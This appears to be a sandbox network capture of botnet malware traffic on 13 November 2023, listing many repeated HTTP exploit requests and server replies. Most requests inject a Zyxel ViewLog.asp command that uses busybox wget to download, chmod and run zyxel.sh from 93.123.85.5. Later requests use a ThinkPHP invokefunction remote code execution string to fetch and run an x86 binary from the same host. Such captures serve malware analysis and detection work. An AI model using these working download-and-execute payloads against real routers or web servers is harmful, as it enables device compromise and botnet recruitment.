                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:13.891973019 CET16591OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.987596035 CET17155OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:25.922348022 CET18091OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.792366028 CET20046OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:14.812112093 CET20710OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              834192.168.2.234603694.123.176.888080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.901295900 CET16275OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              835192.168.2.235485895.169.74.2548080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.901349068 CET16276OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.964447021 CET16410OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:12.301528931 CET16419INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              836192.168.2.235717694.120.40.1438080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.903222084 CET16276OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              837192.168.2.235030894.120.34.38080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.903311014 CET16277OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              838192.168.2.233306094.120.44.988080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.909449100 CET16277OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              839192.168.2.235467094.190.11.1738080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:10.931878090 CET16287OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.326425076 CET16296INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              84192.168.2.234123685.186.38.1318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:21.416524887 CET2708OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:23.186481953 CET2944OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:25.362219095 CET3200OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:29.713603020 CET3786OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:38.160509109 CET4789OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:55.566490889 CET6852OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.377887964 CET11135OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              840192.168.2.234109294.46.210.1928080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:11.373392105 CET16299OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.874861002 CET16398INHTTP/1.1 200 OK
                                                              Content-Type: text/html
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Headers: *
                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS,POST,PUT
                                                              Connection: keep-alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              841192.168.2.235429294.120.29.1178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:11.588422060 CET16303OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              842192.168.2.233786294.79.103.1378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:11.626629114 CET16304OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              843192.168.2.2348972112.126.177.21780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.115605116 CET16413OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:12.432323933 CET16422INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:14 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              844192.168.2.235165495.100.59.14680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.420799017 CET16421OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:12.725884914 CET16452INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:20:12 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:12 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 31 36 31 35 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 34 31 32 26 23 34 36 3b 32 65 36 63 37 39 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2f161502&#46;1699910412&#46;2e6c79b</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              845192.168.2.234498295.216.101.21080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.425015926 CET16422OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:12.734050989 CET16462INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:12 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              846192.168.2.235967095.217.177.6280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.433434963 CET16423OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:12.751395941 CET16463INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.14.0 (Ubuntu)
                                                              Date: Mon, 13 Nov 2023 21:20:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 182
                                                              Connection: close
